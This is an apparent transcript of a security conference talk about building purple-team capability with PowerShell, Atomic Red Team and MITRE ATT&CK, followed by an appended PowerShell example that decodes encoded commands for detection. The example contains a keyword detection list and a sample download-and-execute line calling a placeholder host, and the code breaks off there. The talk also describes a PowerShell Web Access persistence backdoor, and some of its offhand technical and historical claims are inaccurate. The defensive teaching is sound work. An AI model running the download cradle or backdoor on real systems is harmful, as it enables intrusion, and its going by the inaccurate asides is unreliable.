
Offense for Everyone by Bryson Bort

BSides Tampa · 2025 · 53:22 · 249 views · Published 2025-07
Category: Technical
Style: Talk
About this talk
2025 BSides Tampa, Offense for Everyone by Bryson Bort

Description: Security is defined by threat. But, this doesn't mean you need a red TEAM, you need a red CAPABILITY. I will talk through how to build this capability with free tools and PowerShell. I'll also show some free tools I've built to help get started, grow into more sophisticated adversary threat emulation, and to manage the tests (free tool that will drop over the summer). I'll show how to start with PowerShell, where you can get more commands, and some unique ways to use these techniques for credential stealing, lateral movement, and novel persistence.
Transcript [en]

Now you know it's serious. Who's seen me speak before? So you know what you're in for, right? This is why you're like, "We came up front anyway. He's going to come back and [ __ ] with us in the back." And you're right. I will. Um, so this one I did a little bit differently. I know you all have seen me speak about a lot of different things and this is a lot of content. This is going to like make your eyes bleed which is why we're not going to go through all of it. Yay. He's not going to torture us that way because you're still going to get tortured. I mean you realize that,

right? You're not escaping. So I made this like a workbook which means there is an like I said there's a technical density to this that I encourage you after this talk. I'm going to share the slides and I'm going to make them comment only which means you can ask questions in the live document and um you all know I live on an airplane but I will get to your questions. So you'll be like what time zone are you in? I'm like I have no idea. That's why I'm responding to you. It looks like at 2 am your time. Um but ask questions. And the other part is because you'll all be able to see each

other's questions, so you can kind of have a little bit of a dialogue within my presentation after today. Cool. Very cool. So, I've done a bunch of [ __ ] you know that. So, this was my '23 keynote here at BSides Tampa. Um, and this goes to my teaching style. I like to use what's called the Socratic method, which is why I encourage engagement. Good content, but great questions make it real. And part of why I structured this like a technical workshop is because we're going to have a discussion through it. The end of the day, answering your questions and making this more accessible is the point. Who in here would consider themselves a hacker?

You can put your hand down. I'm still coming to you. Or you can keep it up. We can make it awkward.

So, why would you consider yourself a hacker? I spend time pentesting as a hobby, as a hobby. Does this mean if I get a picture with you right now, the FBI is going to arrest us? I keep it clean. Okay. So, you ethically pentest. Correct. All right. So, what does pentesting mean to you? Taking advantage of either the human element, so things that aren't correctly configured, or taking advantage of known vulnerabilities. Okay. By the way, I love the soap you use. Thank you for showering. Can't take that for granted with this audience. Okay, nerds tend to kind of skip some of the hygiene sometimes, so it's greatly appreciated when they do. Thank you. One of the more pleasant people I've sat

next to. Delightful smells. Okay, so some of you would do what you consider hacking. There is a difference of there's different kinds of hacking, though. I used to run an AP. There is an ecosystem of specialization into those elements and we're going to be talking through that because what makes one person a hacker? You could have a completely different skill set than somebody else. Is anyone here a social engineer? No, we don't have social skills. I can tell he's kind of raising their hand. Like I don't I don't know what that is, man. You know, you're going back and forth. I could wave at you, too. What? Depends on the day. Are you a social

engineer today? No. Okay. Off the clock. Fair enough. So far, considering how confused I am, I don't know if you're really good at this or really bad at this. It's hard to tell. And so the idea that I had with this one is again I wanted to cover how offense can be accessible to everyone because it's kind of seen as like the mystic dark art. And the people who do it, I don't know if you've noticed this, their egos are not that small. It's kind of a size thing. Maybe they're compensating. The purpose of hacking, the purpose of offense is to make defense better. The purpose of offense is to make defense better. Anybody who is doing

anything otherwise is doing it to serve their own ego. And we don't have the time or the space for that. We don't have it at a personal level because they're insufferable [ __ ] We don't have it at the organizational level because I don't know if you've noticed like we're not exactly winning this race. Anyone feel like they've got cyber security solved? Anybody? Bueller? No. Good news is that's called job security. So what is cyber security? There's no wrong answers except the wrong answers. So you can shout. What is cyber security? No. As a service that is a brand of cyber security. Not a good one. Yes. So I was coming to you anyway when

you raised your hand. You just What is cyber security? Information security.

Okay. You can't use the word in the definition of for the definition. Protecting protecting information. Protecting information. Who would agree with that? Kind of. Why? Why kind of? You you you were doing the Miss America wave. How to secure? Because we have physical. You have obviously your lovely electronic layer here. Uh cell phones. I literally texted half of my friends and said, "Turn your Bluetooth off because there's going to be some [ __ ] today." Um cyber security to me protecting these 16 critical infrastructures as I word it. So protect was the verb I was picking on because protect is half of it. Once protection fails, the inevitable breach, does cyber security stop? No. Is the correct answer. No, it

doesn't. You don't get to say, "Hey, we got breached. I'm out. Time to put in my 30-day update." Oh, Tyler Trey. Who's doing that? Rams. Okay. All right. Well, the ones that touch my hand are extra special. That sound is so creepy. God, this is why I might owe it HR. Defense is measured by the threat. Whatever your definition is, whether it is protection or like I was talking about the detective elements where we were talking about physical access, any of those phases, any of the things you described, the only measure that matters is can somebody else do something to you that you don't want. That's the definition of cyber security. That's why it's so hard. That's why you

have that existential angst in the pit of your stomach. It's not cuz your anxiety meds aren't working. It's cuz your job is hard. Because no matter what you do, you don't actually know if it works, do you? Because you don't get the ultimate vote. There is no ability to engineer and configure security to this level. You, you know, do some things and then you go home on the weekend and hope you don't get called. That's cyber security. And so our job in offense, by the way, who gets the tracksuit joke? What's the tracksuit joke going on here? Threat actors. Threat actors being Russian.

So the Russians actually fund an entire Rams. You had something. You think you know the answer? Uh, heels on ground, comrade found. Heels in sky, American spy. Slav squat, aka the Slav squat, which is named after the Slavic culture. And that is in fact a way that they all hang out. So if you ever see them doing this, that's the Slav squat. They hang out like that. And westerners tend to pop up their heels when they do it. Try it when you do later. Don't do it now. Also, I probably cuz a lot of you do not look like you work out. See a doctor first before you try this exercise at home. Don't sue me.

Just Just sue me for the HR comments, not for hurting yourself. So this is the joke of the Eastern European ransomware gangs which are as we may have noticed quite significant in our problem. So our goal when we are doing cyber security is to be them. The more realistic the safe the way that we can do this the better we can make ourselves because this is the only measure that matters the fish tank. I tell this story a lot because I think it is incredibly valuable. You're going to learn a lot of information from my talk and other talks today and then you're going to show up at work on Monday and you're going to

probably do none of it. Am I wrong? Why? Why is that the case? Cuz you don't have a job.

Can we convince your mom to do it? For those of you who have jobs, which was the implication, why are you not going to be doing this on Monday? Politics. Politics. Who said politics? Tell me more. Politics. Cuz I am not the person who is actually in charge of anything. No. Even though I should be. Do you want another sticker? You could try to give that to your boss. There you go. See if that bribe will help. There's some things I can't fix, folks. But it brings up the point. Not all of us are in charge, are we? And even if you are in charge, you still have a boss. Does your boss buy into this? Nope.

So my point on this is from where you are these this is change management. Any ideas you want to do that are different than the way things are done today means you need to go and communicate and influence and get buy in to get them to let you to do that. That's your challenge. That's the challenge of taking the stuff from today and it being cool in the moment to actually bringing it to Monday. And that's part of why I was trying to push this in this talk as a workbook because I'm going to give you enough to make the argument, but it's up to you to actually convince the leadership of that. And that's why I

like the story of the fish tank. Simple stories. You want to understand the technical level of your boss. How do you talk to your grandmother at Thanksgiving? You think I'm kidding? I am not. That's how you talk to executives. What? Your remote control is not your phone. No, grandma. Your remote control is not your phone. We taught our grandmother what a donkey punch was.

To be clear, I'm the only one who's allowed to make HR violations. Janine, for future reference,

it was Christmas. Most folks just go with the here grandma, here's the phone with really big buttons. That's as far as we go, especially in public. Come on. The point is the things that your grandmother can understand is the level of detail that you should be providing to executives. They don't give a [ __ ] about the detail. Tell me in 30 seconds why, what, and what's why do I care. Stories like this are an easy way to do that. So, the fish tank. In 2015, the Sands Casino in Las Vegas is owned by a man named Sheldon Adelson. Sheldon decided to have some incendiary commentary about the Shah of Iran. Turns out authoritarians really don't

like being poked fun at. So, they're like, "We're going to get even." So the Iranian revolutionary guard decided to play a game of sticks and stones do hurt my bones and they wanted to get even. Now the Sands Casino is in the finance sector. And if there is anything you can take away from cyber security that has a grain of truth, it's that more money equals more cyber security. More money, more resource, more security. Now whether it works or not, it's a different question. But the chances of just being blanketed into something means you can almost just work by accident. Can you just work in cyber security? I know you both don't have jobs. It's very obvious.

Sorry. So the reason I like the story of the fish tank is there's two aspects. The first is the operations perspective. The Sands Casino said, "We want a multi-million dollar fish tank." You have in your organization, the equivalent of our operations or the business says, "We want this thing." And you're like, "Why? It's the stupidest thing I've ever heard of." Well, guess what? Your culture of no doesn't count. You get to deal with it. Well, in this case, they like it because it gives an ambiance so that high rollers will spend more money. Now, I only did a couple of years of lifeguarding as a teenager, but I know that clean water is better than dirty

water, and fish do better in clean water. So, we need to keep them alive. Dead fish, I don't think, get the high rollers betting. Just a guess. So, we need to be able to keep this water clean. And I'm not paying somebody to sit there and dipstick it every hour, which means I need to have a remote sensor. Now, do you think the people who are running the fish service have sophisticated cyber security or do we think they have their cousin Gary who runs everything cuz he knew how to fix grandma's phone at Thanksgiving Janine. And yeah, so we got our cousin Gary who's doing this. Now Gary's doing his best, but Gary's not an expert. So we now have our way

in. Now, wouldn't you know it that accessing that IoT sensor in that fish tank also coincidentally had access into the core network and $50 million of damage later? 50 million. What's the lesson learned? Is the fish tank an important asset by itself? That financial information was though. And so it's the connections, it's the relationships, it's the dependencies to things that we don't consider important that are the prime surface area for initial access to cause those kinds of issues. That's a story that your folks can understand because you have a fish tank in your organization whether you know it or you don't. Who knows what VirusTotal is? You know part of it. So what's that?

Okay. So VirusTotal. What's happening here? Can you even see it? Not really. I didn't issue the binoculars. Okay. So what we have here is PsExec (the PSEXESVC service) being invoked, which means a tier one highly trained analyst is like I'm seeing an executable that looks bad. Let's throw that in VirusTotal. For those of you who were in Trey and Tyler's awesome talk just a couple of hours ago, wave your hands, gentlemen. We talked about the fact that executables generally get announced in the environment. Somebody's going to do something about it. Some analyst is going to get involved. But PowerShell is a Microsoft signed binary. It is a part of the woodwork. It's built into the

kernel. So when I put that up there, what we see, of course, is everybody saying it's benign. Close ticket. Good. Are we good? Well, we don't know actually. Maybe, maybe not. But certainly that level of attention to detail is not a good one. The fact that they don't know what PowerShell is is actually a common problem. Fact that they don't know how to look for bad PowerShell is a problem. Right? We have a training deficiency. The technical part of our detection framework worked. The human part failed potentially.

It's saying I hear it beeping, but nothing is happening. Beep. There we go. You did that, didn't you? Yeah. Okay. So, we're no longer using this.

So there's different ways to call PowerShell, right? There's the first, the obvious. I can do a string call to just the executable that's there. How easy is that to detect? How easy is that to detect, audience? Extremely easy. Thank you. I can make the cues more obvious if necessary. Or I can start picking out people to use as an example. You like that one, don't you? And you're like, "It won't be me." It probably will be. So, we all know that's easy, which means we need to obfuscate it. And the challenge is obfuscation doesn't even have to be clever. The example I have on there is I just did a string declaration of two variables and concatenated them

for the call. Guess what? Your string check won't get that sophisticated AP. It works. It works. And so the idea here, one, the way I want you to think about this is starting with we need to take the basic calls to PowerShell off the table, right? That's our initial defense. And it's not easy because you're already naturally using PowerShell in your environment. It has it's everywhere. Your IT uses it for management. And so the trick is where can we correlate where they're using it from somebody that shouldn't be? and then looking at those behaviors of what they're doing because it's not just even establishing the initial visibility of a call. It's starting to look at well typically we're seeing

PowerShell being used to push patches. We're seeing PowerShell being used to do a local machine administration. We don't see PowerShell then sending something over DNS. That's probably a little weird. those kinds of connections, those micro emulations where we're seeing behavioral patterns put together. That's the level we want to start piecing together. But it starts with establishing the initial visibility of PowerShell. So, this is the offensive maturity model that we put together. We published it about five years ago and we've been um maintaining it. Um if you saw Trey and Tyler's, they turned this into a pyramid. But here are the takeaways. The first thing I want you to understand when we look at this is vulnerability

scanning, vulnerability assessment and penetration testing on the left side. That is a system view. So the definition I'm using for penetration testing here is unauthorized system access, not the compliance of pentesting which can be a broad definition. So for here it's just how do I break onto a system, right? Kind of like what you were talking about your hobby. You look at how do I get there? That's a system view. Is your enterprise a system? What is it? It's a system of systems, which is where we get to the right side. If you are not thinking in a system of systems perspective, which is what the fish tank story starts to highlight that imagination, you're missing out. And so

the recommendation here is start with the purple teaming concept as that initial step. So for the offense we're going to be doing, start with a purple team to do it. You all graduated first grade. I think some of you maybe not. And you know that red plus blue is purple. First thing I want to do get out of your head. You don't need a red team to do this. That's the whole point of the class we're going to be teaching today is how do you get a red capability? All I need is to be able to demonstrate adversarial techniques and it doesn't have to be sophisticated. Right? And I gave you an example of just

concatenating a string is obfuscation. That's sophisticated. Whatever works is the point. Starting simple is the point. Again, since cyber security is defined by the offense, we need to make offense more accessible to all of us in here. So I don't need to be running Cobalt Strike. I can do simple commands to be able to accomplish that and learn from it. And so doing that in a transparent manner is the best starting point. Collaborate on the scope. Collaborate on the techniques we're going to do. Collaborate on the business objectives. Execute it together in a milestone fashion. Like let's run a command. Let's see what we see. Let's circle back on that. Let's put a detection in place. Let's check it

again. Doing that together is the best system of system starting point. Grow and earn your way to the red team where you have a human operator who can come in and use fish tank imagination to basically still own your active directory drop and leave and then give you a shitty report. So how do I do that? There are three components to an exercise scope. Where are we testing this? Is there value to conducting a risk assessment on a single machine?

Where'd the yes come from? There's I'm like looking into the light. So I can only like tell like general direction. Yes. If the machine is a single point of failure or critical system, it absolutely makes sense to conduct a risk assessment. What if it's not critical? Depends on what it has access to and what it does. Okay. Or if it's representative. Thank you, Brandon. Because I can check my gold images, can I? There is value to looking at what my gold image sees and doesn't see. There's value to what my gold image stops and doesn't stop. There's value to seeing what apps do what. So, that whole I need to have, you know, the the pithy response typically that

you'll hear from red teamers is adversaries don't have scope. Well, guess what, [ __ ] I work at a business and I need a scope because otherwise we get fired. So it is absolutely valid to start with a machine. Now there's limited value I can get from a machine but there's not no value. The more I can include, the more I can test. But now I've made it harder on myself, right? So this is part of why we start simple complexity. Technical complexity is what's the level of the threat that I drive? Do I need to start with something sophisticated? No. And that's what we're going to cover today. We can start with simple things. And then the frequency.

How often do I do these exercises? There's no answer. It has to be what fits you. There are ways to do this at a higher or lower level. Sorry, it's not completely interactive. It's just like higher and lower levels, right? So maybe I don't need to do a full like bring everyone around the table to do a purple team exercise. Maybe there's value in us just sitting down and doing like micro tests on the configuration itself. That's still valuable and it doesn't cost as much, right? Why not spend a Friday afternoon or a lunch just tackling the gold image? Send it whatever things you can think about, right? You don't need approval to do that. All you need is the ability to

just drive a little bit of offense. Okay. So, I came up with this because back when I was AP, I was surprised we always won. And then when I went into the commercial world, I was like, "Oh my god, this is like shooting fish in a barrel. This is so easy." And so I was like, why do we always win? And the reason for it, right, we talked about cyber security isn't solved. Well, that's because if we look at the entire attack chain, it's infinite, right? It starts with reconnaissance. I need to build a target package, right? Half of every Ocean's 11, 12, 13, and 8 movie is putting the team together and building the dossier. The actual theft itself is

pretty short. Then here's where we get hung up as an industry. Initial access, the initial pen test. All I did was get in. In fact, how much of getting in is even technical? Not a lot. It's why we talked about the social engineering earlier. Is phishing technical? No. It's using email the way email was designed and a user clicks on email the way it was designed. If that burns your enterprise to the ground, that's your fault, not the user. So we as an industry though because we are people who make these decisions, right? We were talking earlier, the change we need to happen on Monday is requiring a boss, is requiring leadership buy-in. Well, those same leaders have the same

psychological weakness that we all do. Who doesn't want to keep the mask intruder out of their own house, right? Who doesn't want the lock to work, the barbed wire to catch them? These sharks with laser beams swimming in a moat around your house working.

Janine, you can donkey punch him if you want. The psychology is we try to keep them out which is why I talk to CISOs and I will be like right we talk about assume breach assume they already got in. We talk about the fact that prevention inevitably fails. Any determined threat will break into your enterprise guaranteed. I don't care what scenario you have. It is beatable. Everything is fallible. And again, as we've already covered, it's only partially technical. Your people are the largest risk surface area and they never change and they never will. And so I get them all to agree to that and then I look at their budgets and 95% of their budgets are on prevention. How

do I make the walls higher? How do I solve all the vulnerabilities? Vulnerabilities are third on the list for initial access. Vulnerabilities are not the most common way in back to the exercise. So I can't really reduce your reconnaissance. I can never really stop you on initial access. But even so, who cares? All initial access is a shell call back. I'm on your computer. Cool. I haven't done anything to you yet. Which is why the actions on objectives is the most important part. That's where we see the greatest organizational impact because that's where the thief makes the proverbial money. I'm ransomware. I move laterally as quickly and as far as I can. I lock everything and then I extort

you. That's where you care. That's the moment you care. How do you stop that earlier?

So that means we need to test. We need to make sure things work because what we're evaluating is the portfolio management, the technical and the human elements, not only of the users but of the security staff. Right? Back to that VirusTotal example. We need to see that our SOC analysts actually are trained to the level that we're doing because you can do everything right right in that instance. PowerShell alerted went to the analyst and the analyst threw it in VirusTotal and closed the ticket. We lost. That's the level we need to be evaluating. Next slide. So cyber threat intelligence, it's all [ __ ] That's it. I'm done. Why is it [ __ ] So we spend globally

10 to 11 billion as industry on cyber threat intelligence and 90 to 95% of that spend goes to three things. The bottom of the pyramid of pain bad IP bad hash bad domain because those are easy and more importantly they're machine readable. It's a static value that I can import into a firewall. It's a static value I can import into an EDR. It's a static value I can import into an AV. But from the threat perspective, it's table stakes because how easy is it to change any one of those things? Trivial, which means your defense is catching six months ago and the threat has already moved on. if this is the table stakes that you're already getting. But of

course, that's where you're like, "Well, Bryson, that's where the really flashy analyst reports come in, right? Who's read the 20 to 40 page reports that go into all the detail of exactly what the threat did, what their thinking was, what the techniques they used were? Those are really cool, right? How do I take that and do something with it, though? I mean, I can print out the report and like put it on top of a server and some reason nothing happens. like the server can't read the paper, right? We have to turn that into behavioral components. We have to return that into actions. Those are the signals we need to drive into the environment. So, let's get on the same definitions.

What is a threat? So, it starts with a motive. Me waking up in Moscow, drinking a fifth of vodka, and being angry at you is a motive. How far does that go, though? About as far as I can throw the bottle. doesn't really affect you over here, does it? Until we add capability. So, I take that anger, that motive, that desire, that tracksuit and I take capability now and I can do something. I need tools. I need initial access. I need infrastructure. I need operators who are trained on tradecraft. Go Google Conti Tradecraft and you will see where we actually this is really cool because we have the Conti operator playbook. Like this is where their

operators actually had like a guide that like what to do at certain moments. That's the threat. But here's the cool part. So we had an expression in the intelligence community. I can't create an asset. I can't go up to you and make say you will betray your country. You'll turn me into the FBI. However, I find out that you're getting divorced. I find out you have a gambling problem. Find out you're hooked on heroin. I can tell these all these things just by looking at them. And now I have an opportunity. You've created surface area I can exploit. This is the part of us we control. We, the blue team, we the organization are not defenseless. What we have is what is

needed to be taken advantage of. Don't worry, I didn't bring any viruses from the Middle East. You're safe. Just coughing. Or am I? That combined is the threat. Nope. Next slide. No, it's cool. So, my buddy Casey Ellis is the co-founder of Bugcrowd. For those who don't know Bugcrowd, they're a bug bounty program. So, it's where you can do hobby pen testing, sign up, and break into things and get paid for it. A threat actor is someone who wants to punch you in the face. The threat is the punch being thrown. The vulnerability is your inability to block the punch. And the risk is your likelihood of getting punched in the face. How many of you

feel like high school? Now, next slide. Now, thank you. So, our goal is the top, right? We've covered this. We're not interested in the simple things. We're interested in the behavioral components because the really cool thing I can tell you, you will never ever ever ever ever ever stop a zero day. Anyone who promises you is lying. But it doesn't matter anyway, right? We go back to the BAM model. That's just how I get in. What I do next, you can in fact catch. And if you focus on these techniques over time, you will catch campaigns that have never been seen before because there's going to be an attack logic collision. they will end up

at a place that you've already tested and you got them because there's only so many things I want to do and only so many ways I can do it. So, some more vulnerability. A vulnerability is a type of opportunity. Everyone get that because those get mixed up a lot, right? A vulnerability is just a mistake I can take advantage of. Exploit is the code to take advantage of that mistake. And a threat is where I combine that with human intent because until AI takes over the world, it's still humans doing all of this [ __ ] to you. And that's what they look like. This is what's so interesting about the field you're in. Everything else in the

business is a local problem. Pretty much you in here are up against military and intelligence units from nations that wish us harm. That's your threat. those ransomware gangs funded, sponsored and supported by adversarial, intelligence, and military organizations. Crime has been taken into this as well. This is why your job is so hard. Has anyone seen the estimates on the number of PLA cyber operators that they we think they have? Anyone want to guess how many? thousand 10,000 100,000 is the current estimate in one country. And by the way, that was an estimate from last year, so I'm pretty sure it wasn't static. You are up against over a 100,000 operators just from the Chinese PLA.

Yeah, I know. Next slide. So, here's how we're gonna do threat intelligence for free. Everyone knows MITRE ATT&CK, right? I'm required to say it or MITRE fines me. Don't worry, I'm going to tell you how it's [ __ ] in the next slide or bull crap. So, off of that, they have a groups page. Go to the groups page. Just do a plain text search on that web page for your industry or your location or whatever. In this case, I just typed in defense industry and it will text match with every single group that has been known to be to have done that. And you can go in and see historical campaigns. You can see the tooling they used and

you can see all of the techniques. Now, the thing that's missing from that is they don't give you the order of battle like how actually the logic worked, but it's a great starting point for now you know, well, these are the things they were doing and this is how they did it. You've now just got your technical complexity given to you because you just have to copy that and then grow your own sophistication in the way that you do it. Next slide. So MITRE ATT&CK. Why MITRE ATT&CK? Why am I picking on it? It's a lot. It is a lot. That isn't even all of it. I think there's currently what like 1,250 techniques.

1,250 techniques. That isn't even the complete corpus of the way to do all these things anyway. The number is greater than 1,250 but that's just what ATT&CK has right now. The problem I have with MITRE ATT&CK is it's brilliant and it's right and the value it gave us when it first came out in '13 and then got publicly used really about 2018 is when it started to catch critical mass is it gave us in the industry a common vocabulary to be able to talk about the problem. Before that I'd say like I did credential theft and Tyler would be like I did too but I think I did it differently. Now we have a common lexicon of

vocabulary where we now each know what we're doing. So when we're doing these exercises, we have a way to share what we're doing in a way that we all understand. But like anything that's right and is brilliant, it's been abused. All models are wrong. Some are useful. The problem we have here is you now have a bunch of tools that have turned this into a bingo card. Let's see how I do on Modify Registry. Checklist. Checklist. Checklist. Checklist. I'm green. We're done. Nobody will ever be able to do that to us. Not true. Here's how I want you to think about it. Just like we have a periodic table to describe the real world, that's what this is. This is a periodic

table that describes the individual elements of an attack. And just like in the real world, it takes a unique combination of those atoms to create a particular thing, right? Wood is made of carbon and hydrogen and I don't know what else. I'm just making those up. I'm not even sure it's in those, but carbon is, like, in everything. So, it's the same thing for here. The order of these things happening changes the chemical equation. I didn't steal credentials to high-five around Moscow. I stole credentials. I stole credentials because I'm a user on an asset in a particular instance. And what I do next is going to look different at the host and the network level based on the fact that I

have those credentials now. Which, by the way, now that you're hearing this out loud, right, is why the blue team needs to be focused on that, because if I'm not looking at the state basis, your detections are wrong. And any of you who have used a tool that turns this into a bingo card, I assure you, show up with a real emulation and you will find you have built nothing. Which is why it is so important that we understand how to use this correctly. So that's where we get into simulation versus emulation. I'll highlight here, because I wanted to get to more fun things and we're out of time. Simulation is me doing an exact thing

that has immediate value. That has threat-hunting value. If that is information I get in the middle of that being an activity we're seeing in industry, then good. I can find that exact thing and I can see what is happening to me. But as we've already covered, the adversary is going to change and move on. Which is why we then want to focus on emulation, which is the behavioral components. The variability of that behavior tied to different communication protocols is going to have a different look. That behavior tied to different levels of user access is going to look different. That's the level we want to get to, where we're behavioral at the emulation level, to start catching

tomorrow. Next slide. So, the easiest way to get started and do this is Atomic Red Team. Who has not heard of Atomic Red Team? It's right on the slide. What do you mean? You can lead a horse to water. Seriously, it's picking on you. So, again, workshop level. This is the install command. It will go out and pull the latest version of Atomic Red Team. It will start an instance in your command line, and now you're able to execute atomic tests. The idea here is back to taking MITRE ATT&CK. You don't have to know and go and look up the individual components of how to do a technique or a procedure. All you have to do is say, "I want to do

that part of MITRE ATT&CK," and it'll automatically pull it and do it for you. This is a free tool by Red Canary. Keep in mind it's community-based, which means you want to look at the code before you run it. Be safe. Test before you do something. But it's an easy, offense-for-anyone way to get started to actually being able to drive. I mean, their library has over a thousand items in it right now. So, anybody can run it. It's easy to do. Next slide. Next slide. So, now we're going to talk PowerShell. Next slide. These things are fun, aren't they?

No. Put it up again. We're already there. So, there is a debate in the infosec community. I know. Big surprise. We debate everything. I think if you have two infosec people, you have at least five opinions. And one of them is "why do I care about PowerShell? Everyone gets it. Everyone." And yet here we are, and it still works, and no, you don't. And it is years of work to probably just get PowerShell to a level where you're comfortable with it to work. And so when we look at what the threat is doing, the threat is using PowerShell. Therefore, that's where we want to go. So don't get into the scholastic debate of

"that's too easy, that doesn't matter." It matters. If it works, it matters. If it can be done, it matters. Next slide. So what we're going to cover in this part is encoding, unmanaged, and, that's probably it, I'll skip to PowerShell Web Access, because I did come up with a unique persistence mechanism when I first put this together. I was so surprised at what I did. I'm like, "Wait, did I really find this?" And I shot Trey a message. I'm like, "Does this do what I think it does? Because I am so sleep deprived right now, I'm not sure." And Trey was like, "No, I think we just came up with a novel persistence method." So

you're going to find something that nobody else has seen. Next slide. All right. So offense, right? Tyler covered this in his talk, but in short, back to my obfuscation level, there's this idea called Base64 encoding, which just takes a string and turns it into gobbledegook that a computer can automatically figure out. If you're not looking for that kind of thing, guess what? Again, you're not going to even detect it. So understanding that this is a method is important. Note, there are other ways to do this, right? We covered some of them. There was a GitHub link in the first slide. In this slide, I have a link to an obfuscator. So you

can now use that in your engagements as you grow the complexity to bring automated obfuscation into the testing that you do. Next slide. So, unmanaged PowerShell. Tyler and Trey covered this briefly as well. You aren't trying to win. What you're trying to do is increase the probabilities that you can find something before it can cause any impact to your organization. Which means, partially, how do we make it more expensive to hack us? How do we impose cost on the threat? Your goal is to take away the living-off-the-land of PowerShell and other binaries and scripts that are already organic to your environment, and force the threat to have to build their own code and bring that

to you. Unmanaged PowerShell is that, right? If I take the living-off-the-land PowerShell from you, you now need to bring your own code to be able to get that same functionality. You're more expensive. And the more code and the more actions a threat takes, the more visible they are, the easier it is to detect them. That's where we're trying to get: that imposition of cost to improve our chances. Skip that. Skip that. Okay. So, this was something that we found. On Windows Server there is a particular version of PowerShell called PowerShell Web Access, which was meant for an administrator to be able to remote in and do things in

the server environment. Most servers don't have the same level of protections and detections, because we're not trying to influence the functionality of the server. This is a server because it's providing an entire business function, which means we tend to put less on it and we try to protect around it. And what we found is that with this version of PowerShell, if I install it, you're probably not looking for that. And the best part about it is it provides a back door, which means if you find me and you delete me, I can still come right back. That was the novel persistence method we found on Windows Server 2012 and up: that this functionality can be

installed and provides a permanent back door into the environment. Next slide. Next slide. Next slide. Next slide. Next slide. Next slide. Next slide. Yes, it is on Linux. Press the button again. Or Mac. Did you know that you can get PowerShell on Linux and Mac? So, it was a rhetorical question. So, Windows is where we tend to think of just PowerShell. My point here is every computer in your environment potentially is open to this tool. I can install it. You might already have it. It might be built into the kernel. Another thing to consider is software. Disabling something does not mean it can't be turned back on. So, don't just take the takeaway of,

"Okay, Bryson, we're a Mac shop. I don't have to worry about PowerShell." Every operating system known to humankind has the ability to have PowerShell installed on it. You are not limited to just the Windows environment. Atomic Red Team. So that free tool I showed you earlier, off the web page, you can just text-search and it will give you all of the PowerShell commands that are mapped to all of the MITRE ATT&CK framework. I know. Great. Yeah. Now, again, we don't have to make this hard. There is a corpus of information where I can just text-search, copy, paste, and you are now an APT. You're welcome. Get permission first. Right? We covered that. Next slide.

All right. We covered this earlier and I didn't pick on it, because I really wanted to highlight it here. There are actually only two classes of controls in your environment: preventative, which physical comes under, and detective. We covered earlier the psychology of the preventative control. We are hung up on it because we want to be able to stop something bad from happening. We've already covered you can't, and it's not even where the bad thing happens. The dirty secret of cyber security is 99% plus of your defense is prevention. I'm sorry, is detection. Detection. One of the reasons for that is because prevention is hard to do correctly. How many of you have tried to do

something legitimate and the security tool stopped you? All of you have had that happen. Now, when it happens more than once, what happens? You start getting angry, and you've now just created the best hackers in the world, because when you get in the way of an employee with that culture of no, they cut out your control, they delete it. The problem: you can't block something that's legitimate, and no vendor can do that. CrowdStrike is probably one of the best tools out there, and they can't tell you how you use something in your environment. It's contextual to you. You are in fact a unique snowflake. It's true. Your security is... which is why detection is so important, because

detection doesn't stop something. Detection brings a human in the loop to go, "Okay, something has happened. Now I make an educated, hopefully educated, call on what to do." This is most of your defense. And if you're not driving these signals to test that and to improve that, you're missing it, because threat intelligence going into your prevention isn't going to cut it. It's what we do next. And that's why offense for everyone needs to be the accessibility to drive your own signals on your own time. Next slide. Next slide. Next slide. Next slide. Next slide. Next. Go back. I was testing you. So, visibility. An APT will beat you on a host all day long. Why?

What's that? They're already in there. Yeah, but once I'm there, why can I beat you on a host? Living off the land. So, I'm blending into the tradecraft of what you have right there. I look like a legitimate thing because I am a legitimate thing. You can't win on a host. You can win on the network, because I can't defeat the laws of physics. I go to a one and a zero in the protocols you define in your environment, like everything else does. You now need to correlate that to find me. Next slide. Next slide. Next slide. Next slide. Next slide. Another free tool I put out with George Orchas and Adam Ashinci. So for those

of you who are looking for more sophisticated offensive tooling, we cataloged over 150 tools that are available in the world. We also collaborated with the SANS Institute to put out a Kali Linux distro called SANS Slingshot. So, a number of those and blue team tools are already installed for you. It's a free Linux distro. Next slide. Next slide. Okay. Oh, my QR code didn't make it. All right. So, I do a bunch of things in the community and I have a bunch of projects that I'm kicking off here locally. One of them is we're doing an OSINT project looking at citizen attitudes on cyber security and national security, and a couple of other things.

If you're interested in working with our volunteers, sign up. You'll get a free pizza party with me at some point. And that is the presentation. Thank you. I'll be here all afternoon. [Applause]
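Added example, not part of the talk: the Base64 trick the speaker describes for PowerShell, round-tripped the way `powershell.exe -EncodedCommand` expects it, and then reversed from a process command line the way a detection would do it. The sample command line, the payload string and the `Get-DecodedCommandLine` helper are constructed for this example; the `-e`/`-ec`/`-enc` abbreviations are the ones `powershell.exe` accepts for `-EncodedCommand`.

```powershell
# Added example (not from the talk). Shows why "gobbledegook the computer can figure out"
# is trivial to reverse once you know to look for it.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # powershell.exe expects Base64 over the UTF-16LE bytes of the script ("Unicode" in .NET),
    # not UTF-8. Encode with the wrong charset and the blob decodes to gibberish.
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

function Get-DecodedCommandLine {
    # Hypothetical helper for this example: pull the -EncodedCommand payload out of a
    # command-line field (Sysmon Event ID 1, Security 4688) and decode it.
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts abbreviated switch names, so -e, -ec, -enc and -EncodedCommand
    # all mean the same thing; match the switch, then the Base64 token after it.
    $m = [regex]::Match($CommandLine, '(?i)(?<=\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/]+={0,2})')
    if (-not $m.Success) { return $null }
    try {
        $decoded = ConvertFrom-EncodedCommand $m.Groups[1].Value
    } catch {
        return "<invalid Base64: $($_.Exception.Message)>"
    }
    # Flag the usual suspects in the decoded text; extend this list for your environment.
    $flags = @('iex', 'invoke-expression', 'downloadstring', 'net.webclient', 'frombase64string', 'bypass') |
        Where-Object { $decoded -match [regex]::Escape($_) }
    [pscustomobject]@{
        Switch  = $m.Value.Split(' ')[0]
        Decoded = $decoded
        Flags   = @($flags)
    }
}

# Constructed sample: what the offensive side produces ...
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage.ps1")'
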